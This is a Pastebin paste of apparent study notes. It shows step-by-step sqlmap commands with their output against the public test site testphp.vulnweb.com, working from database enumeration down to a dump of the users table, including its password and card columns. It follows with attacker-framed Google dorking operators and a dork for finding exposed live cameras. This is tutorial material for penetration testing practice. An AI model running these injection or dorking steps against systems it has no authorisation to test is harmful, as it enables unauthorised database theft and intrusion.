API tools faq
paste
Advertisement
Mukezh

Session SQL Map

Mukezh
Apr 2nd, 2019
84
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
raw download clone embed print report
  1.  
  2. SQLMAP
  3. =======
  4. Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
  5.  
  6. Step 1: Open Your Linux Terminal
  7.  
  8. Step 2: python sqlmap -u http://testphp.vulnweb.com/search.php?test=query --dbs
  9.  
  10. Here We can see we got these below databases.
  11. [09:54:16] [INFO] fetching database names
  12. available databases [2]:
  13. [*] acuart <------- Target Database
  14. [*] information_schema
  15.  
  16.  
  17. Step 3: Get the tables of the database
  18.  
  19. python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables
  20. here We got all the tables available in the acuart database
  21. [09:58:49] [INFO] fetching tables for database: 'acuart'
  22. Database: acuart
  23. [8 tables]
  24. +-----------+
  25. | artists |
  26. | carts |
  27. | categ |
  28. | featured |
  29. | guestbook |
  30. | pictures |
  31. | products |
  32. | users |-------> Target Table
  33. +-----------+
  34. Step 4: Get the columns of the users table
  35. python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -T users --columns
  36.  
  37. Output:
  38. Database: acuart
  39. Table: users
  40. [8 columns]
  41. +---------+--------------+
  42. | Column | Type |
  43. +---------+--------------+
  44. | address | mediumtext |
  45. | cart | varchar(100) |
  46. | cc | varchar(100) |
  47. | email | varchar(100) |
  48. | name | varchar(100) |
  49. | pass | varchar(100) |---> Target
  50. | phone | varchar(100) |
  51. | uname | varchar(100) |---> Target
  52.  
  53. Step 5: Get the data from the columns of the above table.
  54. python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -U test -T users --dump
  55.  
  56. Output:
  57. Database: acuart
  58. Table: users
  59. [1 entry]
  60. +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
  61. | cc | name | cart | pass | uname | phone | email | address |
  62. +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
  63. | De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test | 2323345 | jurandir@gmail.com | foda-se |
  64. +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
  65.  
  66.  
  67.  
  68. =x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
  69.  
  70.  
  71. GOOGLE DORKING
  72. ================
  73. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Hackers use Google Dorking to extract only the Desired Data what they exactly want.
  74.  
  75. DORKS COMMANDS
  76. =================
  77.  
  78. = intitle : This allows a attacker to search for pages with specific text in their HTML = title. So intitle: “login page” will help a hacker to find out the web titled “login page”.
  79. = inurl : This allows a hacker to search for pages based on the text contained in the URL eg. “inurl : login.php”.
  80. = intext : This operator searches the entire content of a given page for keywords supplied by the attacker.
  81. = site : limits the scope of a query to a single website.
  82. = cache : This shows the attacker the cached/previous stored version of a website.
  83. = filetype : THis helps in differentiating a attacker the filetype/extension of a particular file he/she is searching.
  84. = indexof : This will helps in finding out the whole index a website is saving for multile files and is open to surf.
  85.  
  86. = Finding Live Cameras - (inurl = “/view/view.shtml?id-”) the resultant will be having the live cameras of Axis Company.
  87. \
  88.  
  89.  
  90. Google Hacking Database --> ghdb -> https://www.exploit-db.com/google-hacking-database/
  91.  
  92.  
  93. =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!